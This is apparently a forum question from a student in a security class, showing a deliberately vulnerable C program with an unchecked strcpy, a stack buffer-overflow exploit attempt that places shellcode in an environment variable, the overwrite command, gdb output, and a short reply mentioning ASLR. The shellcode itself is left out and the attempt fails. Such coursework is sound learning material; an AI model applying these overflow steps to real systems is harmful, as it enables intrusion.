I'm taking a class on security. I have this C code that I have to exploit on a linux system.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv){
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
Using gdb, I have discovered that I must overwrite the return address after 504 hex arbitrary hex values.
I have taken some shell code and placed it in an environmental variable.
export scode=$"*shell code here*"
Then, I made a small C program to output the address of the variable.
int main(){
printf("%#x\n" , getenv("scode"));
}
It outputs the address to be 0xbfffde73
So I try to run the vulnerable program, placing the shellcode address after 504 "A"s.
./vuln `python -c 'print "\x41" * 504' + "\x73\xde\xff\xbf"`
I get a segmentation fault. So I dig a little deeper using gdb. It is correctly overwriting the eip register with the address supplied, but still segfaulting.
(gdb) info registers eip
eip 0xbfffde73 0xbfffde73
It was recommended that I looked what was actually at that address, and I found this:
(gdb) x/20x $eip
0xbfffde73: 0x785c3063 0x785c3338 0x785c6365 0x785c3130
0xbfffde83: 0x785c3838 0x785c3430 0x785c3432 0x785c3836
0xbfffde93: 0x785c3236 0x785c3136 0x785c3337 0x785c3836
0xbfffdea3: 0x785c3836 0x785c3236 0x785c3936 0x785c6536
0xbfffdeb3: 0x785c6632 0x785c3338 0x785c6365 0x785c3130
That doesn't appear to be the shellcode that I placed there. Is this what is causing the segmentation fault? How can I do this properly?
Also, this is the method that we are supposed to use, so I don't think that it's an issue with environmental variables not being executable.
Thanks in advance.
0xbfffde73will be the same across multiple program runs, 2) the memory region storingscodewill be executable. See also this question, paying attention to ASLR and"%p". – DCoder Apr 7 at 8:37